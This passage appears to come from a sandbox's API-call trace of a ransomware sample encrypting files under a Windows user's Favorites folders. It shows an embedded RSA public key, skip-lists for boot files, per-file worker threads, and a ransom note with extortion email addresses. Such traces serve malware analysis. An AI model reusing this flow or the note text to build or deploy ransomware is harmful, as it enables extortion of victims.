dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.400] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0204.401] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0204.401] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0204.402] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0204.402] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0204.402] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="MSN Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites") returned="C:\\Users\\Default\\Favorites\\MSN Websites" [0204.402] SetErrorMode (uMode=0x1) returned 0x1 [0204.402] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites") returned="C:\\Users\\Default\\Favorites\\MSN Websites" [0204.402] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.402] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.402] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" [0204.402] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0204.403] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\MSN Websites") returned="MSN Websites" [0204.403] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0204.403] StrStrW (lpFirst="MSN Autos.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0204.403] StrStrW (lpFirst="MSN Autos.url", lpSrch="ntldr") returned 0x0 [0204.403] StrStrW (lpFirst="MSN Autos.url", lpSrch="NTLDR") returned 0x0 [0204.403] StrStrW (lpFirst="MSN Autos.url", lpSrch="NTDETECT.COM") returned 0x0 [0204.403] StrStrW (lpFirst="MSN Autos.url", lpSrch="ntdetect.com") returned 0x0 [0204.403] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0204.403] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") [0204.403] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.403] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0204.403] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.403] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe84 [0204.404] Sleep (dwMilliseconds=0x96) [0204.552] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0204.552] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="..") returned 1 [0204.553] lstrcmpW (lpString1="MSN Entertainment.url", lpString2=".") returned 1 [0204.553] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0204.553] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="ntldr") returned 0x0 [0204.553] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="NTLDR") returned 0x0 [0204.553] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="NTDETECT.COM") returned 0x0 [0204.553] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="ntdetect.com") returned 0x0 [0204.553] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0204.553] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") [0204.553] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.553] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0204.553] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.553] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe88 [0204.554] Sleep (dwMilliseconds=0x96) [0204.710] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0204.710] lstrcmpW (lpString1="MSN Money.url", lpString2="..") returned 1 [0204.710] lstrcmpW (lpString1="MSN Money.url", lpString2=".") returned 1 [0204.710] StrStrW (lpFirst="MSN Money.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0204.710] StrStrW (lpFirst="MSN Money.url", lpSrch="ntldr") returned 0x0 [0204.710] StrStrW (lpFirst="MSN Money.url", lpSrch="NTLDR") returned 0x0 [0204.710] StrStrW (lpFirst="MSN Money.url", lpSrch="NTDETECT.COM") returned 0x0 [0204.710] StrStrW (lpFirst="MSN Money.url", lpSrch="ntdetect.com") returned 0x0 [0204.710] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0204.710] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") [0204.710] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.710] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0204.711] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe8c [0204.711] WaitForSingleObject (hHandle=0xe8c, dwMilliseconds=0xffffffff) returned 0x0 [0204.712] Sleep (dwMilliseconds=0x96) [0204.864] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0204.864] lstrcmpW (lpString1="MSN Sports.url", lpString2="..") returned 1 [0204.864] lstrcmpW (lpString1="MSN Sports.url", lpString2=".") returned 1 [0204.864] StrStrW (lpFirst="MSN Sports.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0204.865] StrStrW (lpFirst="MSN Sports.url", lpSrch="ntldr") returned 0x0 [0204.865] StrStrW (lpFirst="MSN Sports.url", lpSrch="NTLDR") returned 0x0 [0204.865] StrStrW (lpFirst="MSN Sports.url", lpSrch="NTDETECT.COM") returned 0x0 [0204.865] StrStrW (lpFirst="MSN Sports.url", lpSrch="ntdetect.com") returned 0x0 [0204.865] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0204.865] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") [0204.865] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.865] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0204.865] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe90 [0204.865] Sleep (dwMilliseconds=0x96) [0205.021] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0205.021] lstrcmpW (lpString1="MSN.url", lpString2="..") returned 1 [0205.021] lstrcmpW (lpString1="MSN.url", lpString2=".") returned 1 [0205.021] StrStrW (lpFirst="MSN.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0205.021] StrStrW (lpFirst="MSN.url", lpSrch="ntldr") returned 0x0 [0205.021] StrStrW (lpFirst="MSN.url", lpSrch="NTLDR") returned 0x0 [0205.021] StrStrW (lpFirst="MSN.url", lpSrch="NTDETECT.COM") returned 0x0 [0205.021] StrStrW (lpFirst="MSN.url", lpSrch="ntdetect.com") returned 0x0 [0205.021] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0205.021] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") [0205.021] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.021] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN.url" | out: lpString1="MSN.url") returned="MSN.url" [0205.021] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0205.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe94 [0205.022] Sleep (dwMilliseconds=0x96) [0205.176] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0205.176] lstrcmpW (lpString1="MSNBC News.url", lpString2="..") returned 1 [0205.177] lstrcmpW (lpString1="MSNBC News.url", lpString2=".") returned 1 [0205.177] StrStrW (lpFirst="MSNBC News.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0205.177] StrStrW (lpFirst="MSNBC News.url", lpSrch="ntldr") returned 0x0 [0205.177] StrStrW (lpFirst="MSNBC News.url", lpSrch="NTLDR") returned 0x0 [0205.177] StrStrW (lpFirst="MSNBC News.url", lpSrch="NTDETECT.COM") returned 0x0 [0205.177] StrStrW (lpFirst="MSNBC News.url", lpSrch="ntdetect.com") returned 0x0 [0205.177] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0205.177] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") [0205.177] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.177] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSNBC News.url" | out: lpString1="MSNBC News.url") returned="MSNBC News.url" [0205.177] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0205.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe98 [0205.177] Sleep (dwMilliseconds=0x96) [0205.332] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0205.333] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0205.333] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0205.333] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites") returned="C:\\Users\\Default\\Favorites\\MSN Websites" [0205.333] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" [0205.333] SetErrorMode (uMode=0x1) returned 0x1 [0205.333] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT") returned 61 [0205.333] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0205.334] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0205.334] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xe9c) returned 0x0 [0205.334] RegQueryValueExW (in: hKey=0xe9c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43bb020, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43bb020*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0205.334] RegCloseKey (hKey=0xe9c) returned 0x0 [0205.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0205.334] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0205.334] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\msn websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.334] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\msn websites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0205.336] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0205.336] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\MSN Websites") returned="MSN Websites" [0205.336] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0205.337] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0205.337] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0205.337] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Windows Live" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live") returned="C:\\Users\\Default\\Favorites\\Windows Live" [0205.337] SetErrorMode (uMode=0x1) returned 0x1 [0205.337] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live") returned="C:\\Users\\Default\\Favorites\\Windows Live" [0205.337] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.337] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.337] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\Default\\Favorites\\Windows Live\\*.*" [0205.337] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0205.337] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Windows Live") returned="Windows Live" [0205.337] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0205.337] StrStrW (lpFirst="Get Windows Live.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0205.337] StrStrW (lpFirst="Get Windows Live.url", lpSrch="ntldr") returned 0x0 [0205.337] StrStrW (lpFirst="Get Windows Live.url", lpSrch="NTLDR") returned 0x0 [0205.338] StrStrW (lpFirst="Get Windows Live.url", lpSrch="NTDETECT.COM") returned 0x0 [0205.338] StrStrW (lpFirst="Get Windows Live.url", lpSrch="ntdetect.com") returned 0x0 [0205.338] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned 44 [0205.338] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") [0205.338] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 